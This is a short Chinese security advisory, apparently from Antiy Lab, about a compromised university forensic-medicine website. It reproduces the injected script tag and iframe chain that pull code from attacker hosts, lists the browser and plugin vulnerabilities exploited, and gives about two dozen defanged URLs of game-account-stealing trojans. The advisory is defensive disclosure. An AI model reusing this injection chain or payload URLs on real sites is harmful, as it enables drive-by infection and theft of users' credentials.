中南大学法医网站(hxxp://www.fmcsu.com/)被黑客植入病毒,用户如果访问该网站,系统就会自动从恶意网站上下载并运行恶意程序。被感染病毒的用户系统可能被远程控制,盗取用户敏感信息。甚至导致死机。
该网站问题代码:
<script language="javascript" src="hxxp://css.sarl.tk/css.js?
width=700&height=600&keyword=ua556"></script> |
hxxp://css.sarl.tk/css.js问题框架代码:
document.write('<iframe src=hxxp://www.ryjthd.cn/33/new.htm width=100 height=0></iframe>'); |
hxxp://www.ryjthd.cn/33/new.htm问题框架代码:
<iframe src="au.htm" width=111 height=0 border=0></iframe> |
hxxp://www.ryjthd.cn/33/au.htm问题框架代码
MS06014漏洞
MS08-041漏洞
暴风影音播放器MPS.StormPlayer漏洞
联众世界GLIEDown2.dll Active控件溢出漏洞
RealPlayer播放器IERPCtl.IERPCtl.1漏洞
Adobe Flash Player SWF文件漏洞
当用户访问hxxp://www.fmcsu.com/ 时,系统会自动下载以下病毒文件,并运行病毒文件:
hxxp://www.turthf.cn/c/kjhgjh.exe
hxxp://www.turthf.cn/c/DH.exe
hxxp://www.turthf.cn/c/setup_1027299.exe
hxxp://www.turthf.cn/c/1201.exe
hxxp://www.turthf.cn/c/shf11.exe
hxxp://www.turthf.cn/c/msn080.exe
hxxp://www.turthf.cn/y/horsecqsj.exe
hxxp://www.turthf.cn/y/horsems.exe
hxxp://www.turthf.cn/y/horsedxc.exe
hxxp://www.turthf.cn/y/horsemh.exe
hxxp://www.turthf.cn/y/horsetl.exe
hxxp://www.turthf.cn/y/horsejxsj.exe
hxxp://www.turthf.cn/y/horseqqhx.exe
hxxp://www.turthf.cn/y/horsewd.exe
hxxp://www.turthf.cn/y/horsezt.exe
hxxp://www.turthf.cn/y/horsecqwz.exe
hxxp://www.turthf.cn/y/horseqq.exe
hxxp://www.turthf.cn/y/horsemy.exe
hxxp://www.turthf.cn/y/horsexx.exe
hxxp://www.turthf.cn/y/horsezyhx.exe
hxxp://www.turthf.cn/y/horsexyqj.exe
hxxp://www.turthf.cn/y/horsedh2.exe
hxxp://www.turthf.cn/y/horseqqsg.exe |
以上病毒文件多为游戏盗号类木马,自动运行后将会盗取用户敏感信息,甚至导致死机。由于下载数量太多,这里不一一分析。
【资料来源:安天实验室】 |
